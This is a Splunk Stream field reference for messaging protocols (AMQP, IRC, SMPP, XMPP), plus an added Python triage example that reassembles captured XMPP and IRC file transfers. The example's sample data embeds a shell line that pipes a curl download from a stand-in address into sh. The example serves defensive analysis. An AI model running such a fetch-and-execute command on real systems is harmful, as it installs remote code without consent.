Splunk Stream

Installation and Configuration Manual

Messaging

The Splunk App for Stream supports capture of the following messaging protocols on Linux, Mac, and Windows. For more information, see Configure Streams in the Splunk App for Stream User Manual.

AMQP

Advanced Message Queuing Protocol (ISO/IEC 19464)

Name Description Term
major_version Major version of the protocol amqp.major-version
method Command launched amqp.method
minor_version Minor version of the protocol amqp.minor-version
response_time Server response time in microseconds amqp.response-time
bytes The total number of bytes transferred flow.bytes
src_ip Client IP Address flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
bytes_in The number of bytes sent from client to server flow.cs-bytes
packets_in The total number of packets sent from client to server flow.cs-packets
dest_ip Server IP Address flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
bytes_out The number of bytes sent from server to client flow.sc-bytes
packets_out The total number of packets sent from server to client flow.sc-packets
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport level protocol flow.transport

IRC

Internet Relay Chat RFC 1459

Name Description Term
bytes The total number of bytes transferred flow.bytes
src_ip IP address of the client in dotted-quad notation flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
canceled Number of responses that were canceled early by the client flow.canceled
connection TCP session server endpoint (IP address and TCP port) flow.connection
client_rtt Average round trip time, in microseconds, from the client to the point of capture flow.cp-rtt
client_rtt_packets Number of round trip measurements from the client to the point of capture flow.cp-rtt-packets
client_rtt_sum Sum of all round trip time measurements from the client to the point of capture flow.cp-rtt-sum
ack_packets_in The number of acknowledgement packets sent from client to server flow.cs-ack-packets
request_ack_time Number of microseconds that it took the server to acknowledge receipt of the request flow.cs-ack-time
bytes_in The number of bytes sent from client to server flow.cs-bytes
data_packets_in The number of data packets sent from client to server flow.cs-data-packets
duplicate_packets_in The number of duplicate packets sent from client to server flow.cs-duplicate-packets
missing_packets_in The number of missing packet gaps detected within the request flow.cs-missing-packets
packets_in The total number of packets sent from client to server flow.cs-packets
request_time Number of microseconds it took the client to send a request flow.cs-send-time
server_rtt Average round trip time, in microseconds, from the server to the point of capture flow.ps-rtt
server_rtt_packets Number of round trip measurements from the server to the point of capture flow.ps-rtt-packets
server_rtt_sum Sum of all round trip time measurements from the server to the point of capture flow.ps-rtt-sum
refused Number of requests that were refused by the server flow.refused
dest_ip IP address of the server in dotted-quad notation flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
ack_packets_out The number of acknowledgement packets sent from server to client flow.sc-ack-packets
response_ack_time Number of microseconds that it took the client to acknowledge receipt of the response flow.sc-ack-time
bytes_out The number of bytes sent from server to client flow.sc-bytes
data_packets_out The number of data packets sent from server to client flow.sc-data-packets
duplicate_packets_out The number of duplicate packets sent from server to client flow.sc-duplicate-packets
missing_packets_out The number of missing packet gaps detected within the response flow.sc-missing-packets
packets_out The total number of packets sent from server to client flow.sc-packets
reply_time Number of microseconds that it took the server to start replying to a request flow.sc-reply-time
response_time Number of microseconds that it took the server to send a response flow.sc-send-time
ssl_time Number of microseconds that it took to negotiate an SSL handshake flow.ssl-time
ssl_version SSL protocol version used for encryption; undefined if not encrypted flow.ssl-version
tcp_status TCP handshake status (0=OK, 1=RESET, 2=IGNORED) flow.tcp-status
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport layer protocol (udp or tcp) flow.transport
chat_room_name Chat room name irc.channel
channel_name Name of the IRC channel irc.channel-name
file_identifier File correlation key irc.file-id
filename Name of the transferred file irc.filename
login User's login string irc.login
login_server Concatenated login and server irc.login-server
message Contains the chat message irc.message
mode Status of the IRC channel irc.mode-status
nickname User's alias irc.nick-name
receiver The identity of the receiver for a chat message or a file transfer irc.receiver
sender The identity of the sender of a chat session or a file transfer irc.sender
server Server name to which the user is connected irc.server

SMPP

Short Message Peer-to-Peer

Name Description Term
content Content of the Short Message smpp.content
receiver Receiver address smpp.receiver
sender Sender address smpp.sender
bytes Total number of bytes transferred flow.bytes
src_ip Client IP Address flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
bytes_in The number of bytes sent from client to server flow.cs-bytes
packets_in The total number of packets sent from client to server flow.cs-packets
dest_ip Server IP Address flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
bytes_out The number of bytes sent from server to client flow.sc-bytes
packets_out The total number of packets sent from server to client flow.sc-packets
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport level protocol flow.transport

XMPP

Extensible Messaging and Presence Protocol RFC 6120

Name Description Term
bytes The total number of bytes transferred flow.bytes
src_ip IP address of the client in dotted-quad notation flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
canceled Number of responses that were canceled early by the client flow.canceled
connection TCP session server endpoint (IP address and TCP port) flow.connection
client_rtt Average round trip time, in microseconds, from the client to the point of capture flow.cp-rtt
client_rtt_packets Number of round trip measurements from the client to the point of capture flow.cp-rtt-packets
client_rtt_sum Sum of all round trip time measurements from the client to the point of capture flow.cp-rtt-sum
ack_packets_in The number of acknowledgement packets sent from client to server flow.cs-ack-packets
request_ack_time Number of microseconds that it took the server to acknowledge receipt of the request flow.cs-ack-time
bytes_in The number of bytes sent from client to server flow.cs-bytes
data_packets_in The number of data packets sent from client to server flow.cs-data-packets
duplicate_packets_in The number of duplicate packets sent from client to server flow.cs-duplicate-packets
missing_packets_in The number of missing packet gaps detected within the request flow.cs-missing-packets
packets_in The total number of packets sent from client to server flow.cs-packets
request_time Number of microseconds it took the client to send a request flow.cs-send-time
server_rtt Average round trip time, in microseconds, from the server to the point of capture flow.ps-rtt
server_rtt_packets Number of round trip measurements from the server to the point of capture flow.ps-rtt-packets
server_rtt_sum Sum of all round trip time measurements from the server to the point of capture flow.ps-rtt-sum
refused Number of requests that were refused by the server flow.refused
dest_ip IP address of the server in dotted-quad notation flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
ack_packets_out The number of acknowledgement packets sent from server to client flow.sc-ack-packets
response_ack_time Number of microseconds that it took the client to acknowledge receipt of the response flow.sc-ack-time
bytes_out The number of bytes sent from server to client flow.sc-bytes
data_packets_out The number of data packets sent from server to client flow.sc-data-packets
duplicate_packets_out The number of duplicate packets sent from server to client flow.sc-duplicate-packets
missing_packets_out The number of missing packet gaps detected within the response flow.sc-missing-packets
packets_out The total number of packets sent from server to client flow.sc-packets
reply_time Number of microseconds it took the server to start replying to a request flow.sc-reply-time
response_time Number of microseconds it took the server to send a response flow.sc-send-time
ssl_time Number of microseconds it took to negotiate an SSL handshake flow.ssl-time
ssl_version SSL protocol version used for encryption, or undefined if not encrypted flow.ssl-version
tcp_status TCP handshake status (0=OK, 1=RESET, 2=IGNORED) flow.tcp-status
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport layer protocol (udp or tcp) flow.transport
call_duration Contains call duration in microseconds xmpp.call-duration
call_id Contains call ID, extracted for each call xmpp.call-id
callee Contains the identity (or the phone number) of the called party for a call xmpp.callee
callee_addr Contains address that could be used by the called party xmpp.callee-address
callee_port Contains port on which the callee could receive a call xmpp.callee-port
caller Contains the identity (or the phone number) of the initiator of the call xmpp.caller
caller_addr Contains address which could be used by the initiator of the call xmpp.caller-address
caller_port Contains port on which the caller could start the call xmpp.caller-port
os Contains the client operating system xmpp.client-os
contact_login Contact login xmpp.contact-login
contact_name Contact name xmpp.contact-name
contact_status Contact status xmpp.contact-status
file_chunk_content Contains content of the transferred data xmpp.file-chunk-content
file_chunk_len Contains size of the transferred piece xmpp.file-chunk-length
file_chunk_sid Transferred file identifier xmpp.file-chunk-sid
file_sender Contains the identity of the sender of a file transfer xmpp.file-sender
file_sid Contains transferred file identifier xmpp.file-sid
filesize Size of the transferred file, in bytes xmpp.file-size
filename Contains the name of the transferred file xmpp.filename
login User's login string xmpp.login
message Contains the chat message xmpp.message
encoding Message encoding xmpp.message-encoding
nickname Nickname in use xmpp.nickname
receiver Contains the identity of the receiver of a chat message or a file transfer xmpp.receiver
sender Contains the identity of the sender of a chat session or a file transfer xmpp.sender
start_time Contains start date of the call xmpp.start-time
version Jabber client software version xmpp.version

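The IRC and XMPP tables above describe the fields Stream emits but not how they fit together during triage. The following added example (written for this page, not code from Splunk or the Stream app) reassembles an XMPP file transfer by correlating chunk events (file_chunk_sid, file_chunk_len, file_chunk_content) with the offer event (file_sid, filename, filesize), checks the captured bytes against the announced size, hashes the result, and lists IRC transfers (file_identifier) together with their endpoints and whether the session was TLS-wrapped (ssl_version is undefined when it was not). The sample events are constructed; the one-JSON-object-per-event shape, the base64 encoding of file_chunk_content, the in-order arrival of chunks, and the sourcetype names and addresses used are assumptions of this example.

```python
import base64
import hashlib
import json
from collections import defaultdict

# Constructed sample data, not real captures (assumed addresses from the
# 203.0.113.0/24 and 198.51.100.0/24 documentation ranges).
PAYLOAD_A = b"#!/bin/sh\ncurl -s http://203.0.113.10/stage2 | sh\n"
PAYLOAD_B = b"PK\x03\x04 truncated archive body"


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Field names follow the IRC and XMPP tables on this page. The JSON-per-event
# shape, the base64 chunk encoding and the sourcetype names are assumptions.
SAMPLE_EVENTS = [
    # XMPP transfer 1: offer plus two chunks whose lengths add up to filesize.
    {"sourcetype": "stream:xmpp", "src_ip": "203.0.113.20", "dest_ip": "203.0.113.5",
     "dest_port": 5222, "file_sid": "sid-1", "filename": "update.sh",
     "filesize": len(PAYLOAD_A), "file_sender": "mallory@example.test",
     "receiver": "alice@example.test"},
    {"sourcetype": "stream:xmpp", "file_chunk_sid": "sid-1", "file_chunk_len": 20,
     "file_chunk_content": _b64(PAYLOAD_A[:20])},
    {"sourcetype": "stream:xmpp", "file_chunk_sid": "sid-1",
     "file_chunk_len": len(PAYLOAD_A) - 20, "file_chunk_content": _b64(PAYLOAD_A[20:])},
    # XMPP transfer 2: the offer announces 4096 bytes but only one chunk was captured.
    {"sourcetype": "stream:xmpp", "src_ip": "203.0.113.21", "dest_ip": "203.0.113.5",
     "dest_port": 5222, "file_sid": "sid-2", "filename": "report.zip", "filesize": 4096,
     "file_sender": "bob@example.test", "receiver": "alice@example.test"},
    {"sourcetype": "stream:xmpp", "file_chunk_sid": "sid-2",
     "file_chunk_len": len(PAYLOAD_B), "file_chunk_content": _b64(PAYLOAD_B)},
    # IRC: a file transfer on a non-standard port with no TLS (ssl_version absent).
    {"sourcetype": "stream:irc", "src_ip": "203.0.113.30", "dest_ip": "198.51.100.7",
     "dest_port": 8443, "file_identifier": "f-7", "filename": "wallet.dat",
     "sender": "drone42", "receiver": "opbot", "nickname": "drone42",
     "server": "irc.example.test", "tcp_status": 0},
    # IRC: ordinary chat over TLS with no file; must not be reported as a transfer.
    {"sourcetype": "stream:irc", "src_ip": "203.0.113.31", "dest_ip": "198.51.100.7",
     "dest_port": 6697, "ssl_version": "TLSv1.2", "nickname": "carol",
     "channel_name": "#ops", "message": "deploy done", "tcp_status": 0},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def reassemble_xmpp(lines):
    """Join XMPP chunks to their offer by sid and compare bytes seen with filesize."""
    offers, chunks = {}, defaultdict(list)
    for line in lines:
        ev = json.loads(line)
        if ev.get("sourcetype") != "stream:xmpp":
            continue
        if "file_sid" in ev:
            offers[ev["file_sid"]] = ev
        elif "file_chunk_sid" in ev:
            chunks[ev["file_chunk_sid"]].append(ev)
    results = {}
    for sid, offer in offers.items():
        data = b""
        # No offset field exists in the table, so chunks are assumed in capture order.
        for chunk in chunks.get(sid, []):
            piece = base64.b64decode(chunk["file_chunk_content"])
            # file_chunk_len is the sensor's own count; a mismatch means a mangled event.
            if len(piece) != int(chunk["file_chunk_len"]):
                raise ValueError(f"{sid}: chunk length {chunk['file_chunk_len']} != {len(piece)}")
            data += piece
        expected = int(offer["filesize"])
        complete = len(data) == expected
        results[sid] = {
            "filename": offer["filename"], "sender": offer["file_sender"],
            "receiver": offer["receiver"], "src_ip": offer["src_ip"],
            "dest_ip": offer["dest_ip"], "dest_port": offer["dest_port"],
            "expected_size": expected, "captured_size": len(data),
            "complete": complete, "sha256": sha256_hex(data) if complete else None,
        }
    return results


def irc_transfers(lines):
    """List IRC file transfers with endpoints, nick and TLS status for triage."""
    out = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("sourcetype") != "stream:irc" or "file_identifier" not in ev:
            continue
        out.append({
            "file_identifier": ev["file_identifier"], "filename": ev.get("filename"),
            "sender": ev.get("sender"), "receiver": ev.get("receiver"),
            "src_ip": ev["src_ip"], "dest_ip": ev["dest_ip"], "dest_port": ev["dest_port"],
            "encrypted": "ssl_version" in ev,        # undefined when not encrypted
            "standard_port": ev["dest_port"] in (6667, 6697),
        })
    return out


if __name__ == "__main__":
    for sid, r in reassemble_xmpp(SAMPLE_LINES).items():
        state = "complete" if r["complete"] else f"INCOMPLETE {r['captured_size']}/{r['expected_size']}"
        print(f"xmpp {sid} {r['filename']} {r['sender']} -> {r['receiver']} {state} sha256={r['sha256']}")
    for t in irc_transfers(SAMPLE_LINES):
        print(f"irc {t['file_identifier']} {t['filename']} {t['sender']} -> {t['receiver']} "
              f"{t['dest_ip']}:{t['dest_port']} encrypted={t['encrypted']} std_port={t['standard_port']}")
```

The hash is only reported for a transfer whose captured bytes match filesize; an incomplete reassembly (sid-2 above) is surfaced rather than hashed, since a partial-file hash would never match threat intelligence and would hide the capture gap. Raw event JSON fed to these functions can come from a saved search export of the stream:xmpp and stream:irc sourcetypes.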
For instructions on configuring passive capture of supported protocol data, see "Configure Streams" in the Splunk App for Stream User Manual.

Last modified on 03 March, 2022

This documentation applies to the following versions of Splunk Stream: 8.0.1, 8.0.2, 8.1.0, 8.1.1, 8.1.3